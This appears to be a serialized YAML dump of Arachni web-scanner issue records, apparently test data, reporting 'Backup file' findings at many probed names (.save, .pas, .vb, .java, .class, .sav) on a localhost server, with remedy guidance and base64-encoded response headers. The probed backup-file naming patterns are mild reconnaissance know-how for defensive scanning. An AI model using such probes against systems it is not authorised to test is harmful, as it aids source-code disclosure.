mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.save elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.save injected: some_filename.save id: some_filename.save elem: path remarks: {} method: '' response: some_filename.save headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.php.save elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.php.save injected: some_filename.php.save id: some_filename.php.save elem: path remarks: {} method: '' response: some_filename.php.save headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjI= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.cs elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.cs injected: some_filename.cs id: some_filename.cs elem: path remarks: {} method: '' response: some_filename.cs headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.php.pas elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.php.pas injected: some_filename.php.pas id: some_filename.php.pas elem: path remarks: {} method: '' response: some_filename.php.pas headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjE= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.pas elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.pas injected: some_filename.pas id: some_filename.pas elem: path remarks: {} method: '' response: some_filename.pas headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTc= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: true references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.php.vb elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: true references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.php.vb injected: some_filename.php.vb id: some_filename.php.vb elem: path remarks: {} method: '' response: some_filename.php.vb headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjA= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.vb elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.vb injected: some_filename.vb id: some_filename.vb elem: path remarks: {} method: '' response: some_filename.vb headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.php.java elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.php.java injected: some_filename.php.java id: some_filename.php.java elem: path remarks: :stuff: - Blah - Blah2 method: '' response: some_filename.php.java headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjI= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.java elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.java injected: some_filename.java id: some_filename.java elem: path remarks: {} method: '' response: some_filename.java headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.php.class elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.php.class injected: some_filename.php.class id: some_filename.php.class elem: path remarks: {} method: '' response: some_filename.php.class headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjM= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.class elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.class injected: some_filename.class id: some_filename.class elem: path remarks: {} method: '' response: some_filename.class headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTk= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.php.sav elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.php.sav injected: some_filename.php.sav id: some_filename.php.sav elem: path remarks: {} method: '' response: some_filename.php.sav headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjE= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.sav elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.sav injected: some_filename.sav id: some_filename.sav elem: path remarks: {} method: '' response: some_filename.sav headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTc= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common 